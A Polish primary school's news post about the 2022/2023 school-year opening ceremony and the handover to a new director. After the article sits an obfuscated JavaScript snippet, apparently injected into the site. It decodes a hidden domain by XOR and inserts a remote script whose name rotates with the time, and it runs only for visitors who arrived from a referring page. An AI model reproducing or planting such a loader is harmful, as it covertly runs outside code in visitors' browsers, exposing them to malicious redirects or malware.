Aktualności

Rozpoczęcie roku szkolnego 2022/2023 w Szkole Podstawowej w Kuleszach Kościelnych.

wrz 9, 2022 | Aktualności

1 września 2022 roku o godzinie 9.00 w Szkole Podstawowej im. Kardynała Stefana Wyszyńskiego w Kuleszach Kościelnych odbyło się uroczyste rozpoczęcie roku szkolnego 2022/2023. W spotkaniu rozpoczynającym tegoroczną naukę wzięli udział m.in. Księża z tut. parafii, Wójt Gminy Stefan Grodzki, Sekretarz Gminy Marzena Frankowska, Przewodniczący Rady Gminy Grzegorz Kossakowski, przedstawiciele Rady Rodziców, Rada Pedagogiczna oraz pracownicy administracji i obsługi oraz  uczniowie. Podczas uroczystości Wójt Gminy Stefan Grodzki podziękował za wieloletnią współpracę Pani dyrektor Jolantynie Kamińskiej oraz Panu wicedyrektorowi Andrzejowi Krajewskiemu, którzy do 31 sierpnia 2022 roku kierowali tą jednostką. Następie wręczył powierzenie stanowiska dyrektora Szkoły Podstawowej w Kuleszach Kościelnych Pani Dorocie Zielińskiej na okres pięciu lat szkolnych tj. od 01 września 2022 roku do 31 sierpnia 2027 roku. Nowym wicedyrektorem szkoły został Pan Mariusz Jaworowski. Nowej dyrekcji  życzymy  udanych inicjatyw i decyzji w zarządzaniu, owocnej współpracy z pracownikami, wychowankami, rodzicami i organem prowadzącym, uczniom radości z odkrywania i wgłębiania się w kolejne pokłady wiedzy,  a nauczycielom – satysfakcji z pracy z dziećmi i wielu sukcesów zawodowych.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);